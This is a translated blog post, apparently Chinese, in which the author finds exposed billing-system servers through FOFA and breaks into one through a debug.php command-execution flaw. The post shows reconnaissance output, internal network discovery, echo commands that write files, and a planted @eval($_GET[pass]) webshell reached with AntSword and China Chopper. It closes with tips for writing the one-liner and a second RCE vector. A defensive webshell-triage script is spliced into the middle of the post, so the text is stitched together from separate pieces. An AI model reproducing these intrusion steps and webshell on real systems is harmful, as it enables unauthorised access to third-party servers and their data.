Took a shower in the middle of the night and, while waiting to fall asleep, figured I'd reproduce a vulnerability for practice. Who could have known that once he got started... Right, it's you: the debug.php remote command execution vulnerability. Logged in to FOFA, searched for title="蓝海卓越计费管理系统", tried them one by one, and finally he found one.
Main text
Try running id.
Try running whoami.
Confirm the current directory.
No point being polite then; let's see what's in this directory.
$ ls -l
total 101632
-rw-r--r-- 1 toor root 0 May 21 15:39 +user_1ist.php
-rw-r--r-- 1 toor root 49662475 May 21 14:45 1.tar.gz
-rw-r--r-- 1 toor root 3192358 May 22 00:47 12.txt
-rw-r--r-- 1 toor root 0 May 21 10:49 13,txt
-rw-r--r-- 1 toor root 0 May 21 10:36 13.txt
-rw-r--r-- 1 toor root 0 May 21 11:12 16.txt
-rw-r--r-- 1 toor root 49666353 May 21 14:56 2.tar.gz
-rw-r--r-- 1 toor root 0 May 21 15:06 222.txt
drwxr-xr-x 2 toor root 520 Dec 6 2015 PHPExcel
-rwxr-xr-x 1 toor root 4139 Dec 6 2015 aaacron.php
-rwxr-xr-x 1 toor root 9229 Dec 6 2015 addagent.php
-rwxr-xr-x 1 toor root 1139 Dec 6 2015 agent_setstate.php
-rwxr-xr-x 1 toor root 5832 Dec 6 2015 agentlist.php
-rwxr-xr-x 1 toor root 3798 Dec 6 2015 agentnotice.php
-rwxr-xr-x 1 toor root 5453 Dec 6 2015 agentop.php
drwxr-xr-x 2 toor root 100 Dec 6 2015 ajax
-rwxr-xr-x 1 toor root 57461 Dec 6 2015 ajax_check.php
-rwxr-xr-x 1 toor root 5551 Dec 6 2015 alcatel_notice.php
drwxr-xr-x 2 toor root 40 Dec 6 2015 backup
-rwxr-xr-x 1 toor root 1212 Dec 6 2015 backup_tb.php
-rwxr-xr-x 1 toor root 493 Dec 6 2015 bak_event.php
drwxr-xr-x 2 toor root 100 Dec 6 2015 blackbox
-rwxr-xr-x 1 toor root 9877 Dec 6 2015 card.php
-rwxr-xr-x 1 toor root 4679 Dec 6 2015 card_add.php
-rwxr-xr-x 1 toor root 277 Dec 6 2015 card_del.php
-rwxr-xr-x 1 toor root 8500 Dec 6 2015 card_search.php
-rwxr-xr-x 1 toor root 1278 Dec 6 2015 card_sold_print.php
-rwxr-xr-x 1 toor root 5653 Dec 6 2015 card_sold_show.php
-rwxr-xr-x 1 toor root 2103 Dec 6 2015 chart_product.php
-rwxr-xr-x 1 toor root 1581 Dec 6 2015 chart_product_data.php
-rwxr-xr-x 1 toor root 1446 Dec 6 2015 chart_report.php
-rwxr-xr-x 1 toor root 2352 Dec 6 2015 chart_report_data.php
-rwxr-xr-x 1 toor root 1869 Dec 6 2015 chart_report_pie.php
-rwxr-xr-x 1 toor root 1733 Dec 6 2015 chart_report_pie_data.php
-rwxr-xr-x 1 toor root 1375 Dec 6 2015 chart_user.php
-rwxr-xr-x 1 toor root 3272 Dec 6 2015 chart_user_data.php
-rwxr-xr-x 1 toor root 1573 Dec 6 2015 configAlter.php
-rwxr-xr-x 1 toor root 20176 Dec 6 2015 cron.php
drwxr-xr-x 2 toor root 80 Dec 6 2015 css
drwxr-xr-x 2 toor root 60 Dec 6 2015 data
-rwxr-xr-x 1 toor root 64 Dec 6 2015 db.opt
-rwxr-xr-x 1 toor root 2106 Dec 6 2015 db_auto.php
-rwxr-xr-x 1 toor root 4734 Dec 6 2015 db_backup.php
-rwxr-xr-x 1 toor root 8007 Dec 6 2015 db_backup_tb.php
-rwxr-xr-x 1 toor root 5399 Dec 6 2015 db_restore.php
-rwxr-xr-x 1 toor root 11422 Dec 6 2015 db_user_import.php
-rwxr-xr-x 1 toor root 3296 Dec 6 2015 debug.php
-rwxr-xr-x 1 toor root 1010 Dec 6 2015 delagent.php
-rwxr-xr-x 1 toor root 779 Dec 6 2015 download.php
-rw-r--r-- 1 toor root 0 May 21 00:37 echo
-rwxr-xr-x 1 toor root 11178 Dec 6 2015 editagent.php
-rwxr-xr-x 1 toor root 3498 Dec 6 2015 endtime_modification.php
-rwxr-xr-x 1 toor root 5671 Dec 6 2015 finance_MTC_add.php
-rwxr-xr-x 1 toor root 14458 Dec 6 2015 finance_details.php
-rwxr-xr-x 1 toor root 23320 Dec 6 2015 finance_report.php
-rwxr-xr-x 1 toor root 7546 Dec 6 2015 financial_subjects.php
drwxr-xr-x 2 toor root 40 Dec 6 2015 ftpbackup
-rwxr-xr-x 1 toor root 2465 Dec 6 2015 guestbook.php
-rwxr-xr-x 1 toor root 2661 Dec 6 2015 guestbook_reply.php
drwxr-xr-x 2 toor root 2820 Dec 6 2015 img
drwxr-xr-x 2 toor root 420 Dec 6 2015 inc
-rwxr-xr-x 1 toor root 2169 Dec 6 2015 index.php
-rwxr-xr-x 1 toor root 5567 Dec 6 2015 instantPaymen.php
-rwxr-xr-x 1 toor root 4003 Dec 6 2015 ippool.php
-rwxr-xr-x 1 toor root 3342 Dec 6 2015 ippool_add.php
-rwxr-xr-x 1 toor root 573 Dec 6 2015 ippool_del.php
-rwxr-xr-x 1 toor root 3433 Dec 6 2015 ippool_edit.php
-rwx------ 1 toor root 1043 Dec 6 2015 jm.php
drwxr-xr-x 4 toor root 220 Dec 6 2015 js
-rwxrwxrwx 1 toor root 40 May 21 16:10 kk.php
-rwxr-xr-x 1 toor root 14708 Dec 6 2015 left.php
-rwxr-xr-x 1 toor root 101 Dec 6 2015 license.php
drwxr-xr-x 3 toor root 60 Dec 6 2015 locale
-rwxr-xr-x 1 toor root 2913 Dec 6 2015 login.php
-rwxr-xr-x 1 toor root 1593 Dec 6 2015 login_check.php
-rwxr-xr-x 1 toor root 571 Dec 6 2015 login_out.php
-rwxr-xr-x 1 toor root 8961 Dec 6 2015 mail_backup.php
-rwxr-xr-x 1 toor root 8919 Dec 6 2015 main.php
-rwxr-xr-x 1 toor root 6414 Dec 6 2015 manager.php
-rwxr-xr-x 1 toor root 5217 Dec 6 2015 manager_add.php
-rwxr-xr-x 1 toor root 333 Dec 6 2015 manager_del.php
-rwxr-xr-x 1 toor root 14319 Dec 6 2015 manager_edit.php
-rwxr-xr-x 1 toor root 2356 Dec 6 2015 manager_group.php
-rwxr-xr-x 1 toor root 4703 Dec 6 2015 manager_group_add.php
-rwxr-xr-x 1 toor root 452 Dec 6 2015 manager_group_del.php
-rwxr-xr-x 1 toor root 4953 Dec 6 2015 manager_group_edit.php
-rwxr-xr-x 1 toor root 11251 Dec 6 2015 manager_permision.php
-rwxr-xr-x 1 toor root 2937 Dec 6 2015 manager_pwd_edit.php
drwxr-xr-x 3 toor root 60 Dec 6 2015 mnt
-rwxr-xr-x 1 toor root 24926 Dec 6 2015 more_add.php
-rwxr-xr-x 1 toor root 2166 Dec 6 2015 more_add_save.php
-rw-r--r-- 1 toor root 4 May 21 00:42 ni.php
-rwxr-xr-x 1 toor root 5482 Dec 6 2015 njtn_fttx.php
-rwxr-xr-x 1 toor root 8715 Dec 6 2015 njtn_region.php
-rwxr-xr-x 1 toor root 4439 Dec 6 2015 njtnisp_add.php
-rwxr-xr-x 1 toor root 5558 Dec 6 2015 njtnisp_edit.php
-rwxr-xr-x 1 toor root 2797 Dec 6 2015 njtnisp_list.php
-rwxr-xr-x 1 toor root 1079 Dec 6 2015 online.php
-rwxr-xr-x 1 toor root 5452 Dec 6 2015 opagent.php
-rwxr-xr-x 1 toor root 53629 Dec 6 2015 open-flash-chart.swf
-rwxr-xr-x 1 toor root 4201 Dec 6 2015 operate_login_log.php
-rwxr-xr-x 1 toor root 8813 Dec 6 2015 operate_netplay_log.php
-rwxr-xr-x 1 toor root 9649 Dec 6 2015 operate_online.php
-rwxr-xr-x 1 toor root 5280 Dec 6 2015 operate_userlog.php
-rwxr-xr-x 1 toor root 8204 Dec 6 2015 order.php
-rwxr-xr-x 1 toor root 40164 Dec 6 2015 order_add.php
-rwxr-xr-x 1 toor root 448 Dec 6 2015 order_del.php
-rwxr-xr-x 1 toor root 5311 Dec 6 2015 order_run.php
-rwxr-xr-x 1 toor root 4677 Dec 6 2015 order_ticket.php
-rwxr-xr-x 1 toor root 6456 Dec 6 2015 pause.php
-rwx------ 1 toor root 520 Dec 6 2015 pdo.php
drwxr-xr-x 2 toor root 80 Dec 6 2015 php-ofc-library
-rwxr-xr-x 1 toor root 19 May 20 19:59 phpinfo.php
drwxr-xr-x 3 toor root 120 Dec 6 2015 phpmailer
-rwxr-xr-x 1 toor root 7998 Dec 6 2015 product.php
-rwxr-xr-x 1 toor root 29764 Dec 6 2015 product_add.php
-rwxr-xr-x 1 toor root 584 Dec 6 2015 product_del.php
-rwxr-xr-x 1 toor root 27481 Dec 6 2015 product_edit.php
-rwxr-xr-x 1 toor root 5984 Dec 6 2015 project.php
-rwxr-xr-x 1 toor root 18772 Dec 6 2015 project_add.php
-rwxr-xr-x 1 toor root 731 Dec 6 2015 project_del.php
-rwxr-xr-x 1 toor root 22354 Dec 6 2015 project_edit.php
-rwxr-xr-x 1 toor root 7087 Dec 6 2015 project_ros.php
-rwxr-xr-x 1 toor root 5012 Dec 6 2015 receipt_list.php
-rwxr-xr-x 1 toor root 10531 Dec 6 2015 recharge_log.php
-rwxr-xr-x 1 toor root 5670 Dec 6 2015 recharge_reverse.php
-rwxr-xr-x 1 toor root 10604 Dec 6 2015 recharge_user.php
-rwxr-xr-x 1 toor root 5231 Dec 6 2015 rechargeagent.php
-rwxr-xr-x 1 toor root 7333 Dec 6 2015 repair.php
-rwxr-xr-x 1 toor root 3258 Dec 6 2015 repair_add.php
-rwxr-xr-x 1 toor root 345 Dec 6 2015 repair_del.php
-rwxr-xr-x 1 toor root 6547 Dec 6 2015 repair_disposal.php
-rwxr-xr-x 1 toor root 229 Dec 6 2015 repair_disposal_del.php
-rwxr-xr-x 1 toor root 6577 Dec 6 2015 repair_disposal_edit.php
-rwxr-xr-x 1 toor root 5476 Dec 6 2015 repair_disposal_log.php
-rwxr-xr-x 1 toor root 2596 Dec 6 2015 repair_edit.php
-rwxr-xr-x 1 toor root 3728 Dec 6 2015 repair_show_print.php
-rwxr-xr-x 1 toor root 11115 Dec 6 2015 ros_static_ip.php
-rwxr-xr-x 1 toor root 5901 Dec 6 2015 ros_write.php
-rwxr-xr-x 1 toor root 5205 Dec 6 2015 scan_dayparting.php
-rwxr-xr-x 1 toor root 1750 Dec 6 2015 scan_db_backup.php
-rwxr-xr-x 1 toor root 1586 Dec 6 2015 scan_down_line.php
-rwxr-xr-x 1 toor root 8360 Dec 6 2015 scan_everyone_hour.php
-rwxr-xr-x 1 toor root 8051 Dec 6 2015 scan_flow_limit.php
-rwxr-xr-x 1 toor root 1659 Dec 6 2015 scan_hour_flow.php
-rwxr-xr-x 1 toor root 1298 Dec 6 2015 scan_order_status.php
-rwxr-xr-x 1 toor root 4775 Dec 6 2015 scan_stop_restore.php
-rwxr-xr-x 1 toor root 43623 Dec 6 2015 scan_time_len.php
-rwxr-xr-x 1 toor root 509 Dec 6 2015 scan_timeout.php
-rwxr-xr-x 1 toor root 2109 Dec 6 2015 sendmail_backup.php
drwxr-xr-x 2 toor root 40 Dec 6 2015 sendmailbackup
-rwxr-xr-x 1 toor root 5280 Dec 6 2015 sendsms.php
-rwxr-xr-x 1 toor root 2175 Dec 6 2015 short_messages.php
-rwxr-xr-x 1 toor root 2916 Dec 6 2015 speedrule.php
-rwxr-xr-x 1 toor root 3756 Dec 6 2015 speedrule_add.php
-rwxr-xr-x 1 toor root 229 Dec 6 2015 speedrule_del.php
-rwxr-xr-x 1 toor root 4681 Dec 6 2015 speedrule_edit.php
drwxr-xr-x 3 toor root 60 Dec 6 2015 style
-rwxr-xr-x 1 toor root 2783 Dec 6 2015 system_config.php
-rwxr-xr-x 1 toor root 7461 Dec 6 2015 system_configuration.php
-rwxr-xr-x 1 toor root 2338 Dec 6 2015 system_database.php
-rwxr-xr-x 1 toor root 5054 Dec 6 2015 system_del_dial_log.php
-rwxr-xr-x 1 toor root 3370 Dec 6 2015 system_mac.php
-rwxr-xr-x 1 toor root 12563 Dec 6 2015 system_message_config.php
-rwxr-xr-x 1 toor root 3203 Dec 6 2015 system_message_d.php
-rwxr-xr-x 1 toor root 3603 Dec 6 2015 system_message_g.php
-rwxr-xr-x 1 toor root 3170 Dec 6 2015 system_message_j.php
-rwxr-xr-x 1 toor root 3664 Dec 6 2015 system_message_k.php
-rwxr-xr-x 1 toor root 3261 Dec 6 2015 system_message_v.php
-rwxr-xr-x 1 toor root 3643 Dec 6 2015 system_message_x.php
-rwxr-xr-x 1 toor root 5512 Dec 6 2015 system_publicnotice.php
-rwxr-xr-x 1 toor root 2733 Dec 6 2015 system_upgrade.php
-rwxr-xr-x 1 toor root 35505 May 22 00:00 t.php
drwxr-xr-x 2 toor root 40 Dec 6 2015 tb_backup
-rwxr-xr-x 1 toor root 1356 Dec 6 2015 test.php
-rwxr-xr-x 1 toor root 14960 Dec 6 2015 top.php
-rwxr-xr-x 1 toor root 4989 Dec 6 2015 truncate_alltable.php
-rwxrwxrwx 1 toor root 26 May 21 08:57 tui.php
-rwxrwxrwx 1 toor root 48 May 21 09:16 ty.php
-rwxrwxrwx 1 toor root 23 May 21 09:17 ty1.php
-rwxr-xr-x 1 toor root 20010 Dec 6 2015 user.php
-rwxr-xr-x 1 toor root 27496 Dec 6 2015 user_add.php
-rwxr-xr-x 1 toor root 5591 Dec 6 2015 user_assigned.php
-rwxr-xr-x 1 toor root 9119 Dec 6 2015 user_bill.php
-rwxr-xr-x 1 toor root 7273 Dec 6 2015 user_change_banwith.php
-rwxr-xr-x 1 toor root 7175 Dec 6 2015 user_closing.php
-rwxr-xr-x 1 toor root 13985 Dec 6 2015 user_closing_info.php
-rwxr-xr-x 1 toor root 3709 Dec 6 2015 user_del.php
-rwxr-xr-x 1 toor root 1926 Dec 6 2015 user_down_line.php
-rwxr-xr-x 1 toor root 31015 Dec 6 2015 user_edit.php
-rwxr-xr-x 1 toor root 8433 Dec 6 2015 user_flow_monitor.php
-rwxr-xr-x 1 toor root 9098 Dec 6 2015 user_hours_show.php
-rw-r--r-- 1 toor root 8 May 21 08:35 user_list.txt
-rwxr-xr-x 1 toor root 12429 Dec 6 2015 user_maturity.php
-rwxr-xr-x 1 toor root 6240 Dec 6 2015 user_move.php
-rwxr-xr-x 1 toor root 9520 Dec 6 2015 user_netbar.php
-rwxr-xr-x 1 toor root 13821 Dec 6 2015 user_normal_info.php
-rwxr-xr-x 1 toor root 12393 Dec 6 2015 user_pause.php
-rwxr-xr-x 1 toor root 5114 Dec 6 2015 user_pledgemoney.php
-rwxr-xr-x 1 toor root 13560 Dec 6 2015 user_replac_product.php
-rwxr-xr-x 1 toor root 2235 Dec 6 2015 user_rewrite.php
-rwxr-xr-x 1 toor root 26475 Dec 6 2015 user_show_print.php
-rwxr-xr-x 1 toor root 7698 Dec 6 2015 user_shutdown.php
-rwxr-xr-x 1 toor root 12953 Dec 6 2015 user_upcoming.php
-rwxr-xr-x 1 toor root 2168 May 20 20:07 userlog_table_attr.php
drwxr-xr-x 3 toor root 60 Dec 6 2015 usr
-rwxr-xr-x 1 toor root 3080 Dec 6 2015 vcodelogin.php
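A defender-side triage of a listing like the one above, as an added example that is not part of the original post: it parses `ls -l` lines and flags regular files that were modified after the deployment baseline, are world-writable, are one-liner-sized .php files, or carry a homoglyph name (the +user_1ist.php / user_list pair). The sample listing is a subset copied from the output above; the `recent` flag relies on ls printing HH:MM only for mtimes within about six months.

```python
"""Triage an `ls -l` listing of a PHP webroot for likely webshell drops."""
import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed sample: a subset of the `ls -l` output quoted in the post.
SAMPLE_LISTING = """\
total 101632
-rw-r--r-- 1 toor root 0 May 21 15:39 +user_1ist.php
-rwxr-xr-x 1 toor root 3296 Dec 6 2015 debug.php
drwxr-xr-x 2 toor root 420 Dec 6 2015 inc
-rwxrwxrwx 1 toor root 40 May 21 16:10 kk.php
-rwxr-xr-x 1 toor root 101 Dec 6 2015 license.php
-rwxr-xr-x 1 toor root 1593 Dec 6 2015 login_check.php
-rw-r--r-- 1 toor root 4 May 21 00:42 ni.php
-rwxr-xr-x 1 toor root 19 May 20 19:59 phpinfo.php
-rwxr-xr-x 1 toor root 35505 May 22 00:00 t.php
-rwxrwxrwx 1 toor root 26 May 21 08:57 tui.php
-rwxrwxrwx 1 toor root 48 May 21 09:16 ty.php
-rwxrwxrwx 1 toor root 23 May 21 09:17 ty1.php
-rwxr-xr-x 1 toor root 20010 Dec 6 2015 user.php
-rw-r--r-- 1 toor root 8 May 21 08:35 user_list.txt
-rwxr-xr-x 1 toor root 2168 May 20 20:07 userlog_table_attr.php
"""

# perms links owner group size month day (year | HH:MM) name
LS_LINE = re.compile(
    r"^(?P<perms>[-dl][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+(?P<size>\d+)\s+"
    r"(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2})\s+(?P<stamp>\d{4}|\d{2}:\d{2})\s+(?P<name>.+)$"
)


@dataclass
class Entry:
    perms: str
    size: int
    date: str              # e.g. "Dec 6 2015" or "May 21 16:10"
    recent: bool           # ls prints HH:MM instead of a year for mtimes within ~6 months
    name: str
    reasons: list = field(default_factory=list)

    @property
    def is_dir(self) -> bool:
        return self.perms[0] == "d"

    @property
    def world_writable(self) -> bool:
        return self.perms[8] == "w"   # the "other" write bit


def parse_listing(text: str) -> list:
    """Turn `ls -l` output into Entry objects; the 'total N' line does not match."""
    entries = []
    for line in text.splitlines():
        m = LS_LINE.match(line.strip())
        if m:
            stamp = m["stamp"]
            entries.append(Entry(m["perms"], int(m["size"]),
                                 f"{m['mon']} {m['day']} {stamp}", ":" in stamp, m["name"]))
    return entries


def lookalike_key(name: str) -> str:
    """Fold digit/letter homoglyphs and leading junk so +user_1ist.php keys like user_list.*"""
    stem = name.lstrip("+-_.").rsplit(".", 1)[0].lower()
    return stem.replace("1", "l").replace("0", "o")


def triage(text: str, tiny_bytes: int = 64) -> list:
    """Return the regular files that deserve a closer look, each with its reasons."""
    entries = parse_listing(text)
    files = [e for e in entries if not e.is_dir]
    # Deployment baseline: the full date shared by most application files (Dec 6 2015 here).
    dated = Counter(e.date for e in files if not e.recent)
    baseline = dated.most_common(1)[0][0] if dated else None
    keys = Counter(lookalike_key(e.name) for e in entries)
    flagged = []
    for e in files:
        is_php = e.name.lower().endswith(".php")
        if e.recent and baseline:
            e.reasons.append(f"modified {e.date}, long after the {baseline} deployment")
        if e.world_writable:
            e.reasons.append("world-writable")
        if is_php and e.size <= tiny_bytes:
            e.reasons.append(f"tiny PHP file ({e.size} bytes), one-liner shell sized")
        if keys[lookalike_key(e.name)] > 1 and any(c in e.name for c in "+10"):
            e.reasons.append("name is a homoglyph lookalike of another entry")
        if e.reasons:
            flagged.append(e)
    return flagged


if __name__ == "__main__":
    for entry in triage(SAMPLE_LISTING):
        print(f"{entry.name:28} {'; '.join(entry.reasons)}")
```

On a live system, `ls -l --time-style=full-iso` or `find -newermt` gives exact timestamps instead of the six-month heuristic.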
Let's look for the database config first; check login_check.php.
$ cat login_check.php
#!/bin/php
<?php
// Brings in the DB handle ($db) and helpers such as filtersql() and getClientIp(),
// none of which are defined in this file.
include("inc/conn.php");
date_default_timezone_set('Asia/Shanghai');
if($_POST)
{
$_POST=filtersql($_POST);
$manager_account=$_POST["username"];
$manager_passwd =md5($_POST["pwd"]);
// Account name and unsalted MD5 hash are concatenated straight into the WHERE clause;
// filtersql() is the only thing standing between $_POST and the query.
$record =$db->select_one("*","manager","manager_account='".$manager_account."' and manager_passwd='".$manager_passwd."'");
if($record)
{
$_SESSION["managerID"] =$record["ID"];
$_SESSION["manager"] =$record["manager_account"];
$_SESSION["auth_permision"] =explode("#",$record["manager_permision"]);
$_SESSION["auth_project"] =empty($record["manager_project"])?"0":$record["manager_project"];
$_SESSION["auth_gradeID"] =empty($record["manager_gradeID"])?"0":$record["manager_gradeID"];
$_SESSION["addusernum"] =$record["addusernum"];
$_SESSION["addusertotalnum"] =$record["addusertotalnum"];
$_SESSION["managerlogintime"] =time();
$productID=empty($record["manager_product"])?"0":$record["manager_product"];
$product=$db->select_all('productID',"productandproject","projectID in (".$_SESSION["auth_project"].") and productID in (".$productID.")");
if(is_array($product))
{
foreach($product as $prs)
{
// $pID is never initialised before the first .=
$pID.=$prs['productID'].",";
}
$pID = rtrim($pID,",");
$_SESSION["auth_product"]=empty($pID)?"0":$pID ;
}
else
{
$_SESSION["auth_product"]=0;
}
$sql=array(
"name"=>$_SESSION["manager"],
"logindatetime"=>date("Y-m-d H:i:s",time()),
"loginip"=>getClientIp(),
"content"=>$_SERVER['REQUEST_URI']
);
$db->insert_new("loginlog",$sql);
echo "ok";
}
else
{
echo "err";
}
}
?>
Ah, so it includes an inc/conn.php file. Let's take a look.
Oh, the database is on the local machine. So let's connect to it. Messed around in the VM for a while and found I apparently couldn't connect. Failed.
That's not right, the port should be open. Checked online and 6379 isn't open. Done. Nothing to play with.
I used dnslog to check the callback. Huh? What's going on, it's different from the site's IP. Probably an internal host that isn't directly connected to the public internet.
Check ifconfig -a
$ ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:90:27:FF:67:B2
inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:16 Memory:fe6e0000-fe700000
eth1 Link encap:Ethernet HWaddr 00:90:27:FF:67:B3
inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:17 Memory:fe7e0000-fe800000
eth2 Link encap:Ethernet HWaddr 00:90:27:FF:67:B4
inet addr:192.168.2.201 Bcast:192.168.2.255 Mask:255.255.255.0
inet6 addr: fe80::290:27ff:feff:67b4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:966110 errors:0 dropped:0 overruns:0 frame:0
TX packets:1100154 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:139520684 (133.0 MiB) TX bytes:403410471 (384.7 MiB)
Interrupt:18 Memory:fe8e0000-fe900000
eth3 Link encap:Ethernet HWaddr 00:90:27:FF:67:B5
inet addr:192.168.3.1 Bcast:192.168.3.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:19 Memory:fe9e0000-fea00000
eth4 Link encap:Ethernet HWaddr 00:90:27:FF:67:B6
inet addr:192.168.4.1 Bcast:192.168.4.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:16 Memory:feae0000-feb00000
eth5 Link encap:Ethernet HWaddr 00:90:27:FF:67:B7
inet addr:192.168.5.1 Bcast:192.168.5.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:17 Memory:febe0000-fec00000
gre0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-20-00-00-00-00-00-00-00-00-00
NOARP MTU:1476 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
gretap0 Link encap:Ethernet HWaddr 00:00:00:00:00:00
BROADCAST MULTICAST MTU:1462 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
ip_vti0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-20-00-00-00-00-00-00-00-00-00
NOARP MTU:1364 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:6024897 errors:0 dropped:0 overruns:0 frame:0
TX packets:6024897 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1739123468 (1.6 GiB) TX bytes:1739123468 (1.6 GiB)
sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
teql0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
NOARP MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
tunl0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-20-00-00-00-00-00-00-00-00-00
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Check route -n
So it really is an internal host, sitting on the 192.168.2.x segment, and ping 192.168.2.200 goes through.
So what's the best thing to do?
How about writing a webshell?
Test with phpinfo(); first.
Write it in bit by bit with echo:
echo '<?php '>999.php
echo 'phpinfo();'>>999.php
Open it directly. Huh? Insufficient permissions?
Yeah, it really is insufficient permissions, and I don't know how to raise its privileges either. What now?
While thinking it over I glanced around and found a file called license.php. Its permissions are generous: -rwxr-xr-x. Tried overwriting it and, well well, the permissions stay the same! Let's take a look.
OK, now it's fun.
Things just got interesting. Drop the shell!
Just a one-liner: @eval($_GET[pass]);
AntSword! Test!
Damn thing, it's online!
Let's see what goodies there are!
What's going on? HTML-escaped?
What kind of stupid thing is this? What now?
It's too late now; I'll have to ask the big shots tomorrow morning...
Oh right, since it includes inc/conn.php and I can modify files, couldn't I just ask it for the account and password? Something to think about!
In the end I connected with China Chopper (菜刀) and it threw no errors!
Postscript
According to what peiqi found, time.php takes an unfiltered parameter that leads to remote command execution; passing the parameter in a POST request is enough to execute commands.
When writing the one-liner, use single quotes, and $ has to be escaped as \$ as well.